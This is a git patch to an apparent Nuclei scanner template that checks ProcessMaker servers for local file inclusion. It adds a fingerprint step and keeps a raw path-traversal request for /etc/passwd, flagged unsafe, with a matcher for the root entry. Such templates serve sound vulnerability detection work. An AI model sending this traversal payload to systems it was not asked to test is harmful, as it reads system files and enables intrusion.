From 6a3d9c4a13c90a14240db261c56ccfadb34a560d Mon Sep 17 00:00:00 2001
From: Prince Chaddha <prince@projectdiscovery.io>
Date: Mon, 6 Nov 2023 16:44:30 +0530
Subject: [PATCH] Update processmaker-lfi.yaml

---
 .../other/processmaker-lfi.yaml                | 18 ++++++++++++++++--
 1 file changed, 16 insertions(+), 2 deletions(-)

diff --git a/http/vulnerabilities/other/processmaker-lfi.yaml b/http/vulnerabilities/other/processmaker-lfi.yaml
index 981d156583..0e3088f830 100644
--- a/http/vulnerabilities/other/processmaker-lfi.yaml
+++ b/http/vulnerabilities/other/processmaker-lfi.yaml
@@ -16,20 +16,34 @@ info:
     max-request: 1
   tags: processmaker,lfi,edb
 
+flow: http(1) && http(2)
+
 http:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "ProcessMaker"
+          - "processmaker_login.png"
+        condition: and
+
   - raw:
       - |
         GET /../../../..//etc/passwd HTTP/1.1
         Host: {{Hostname}}
 
+    unsafe: true
     matchers-condition: and
     matchers:
       - type: regex
+        part: body
         regex:
           - "root:.*:0:0:"
 
       - type: status
         status:
           - 200
-
-# digest: 4b0a00483046022100da555d18f71eb6881ca5964baad008dd99f39b49f214baf31cd330bddf25cb99022100a9861f6ed78d2af0a51e2d5ed11a77aaa793991c3843e3ff06560891a013f7e2:922c64590222798bb761d5b6d8e72950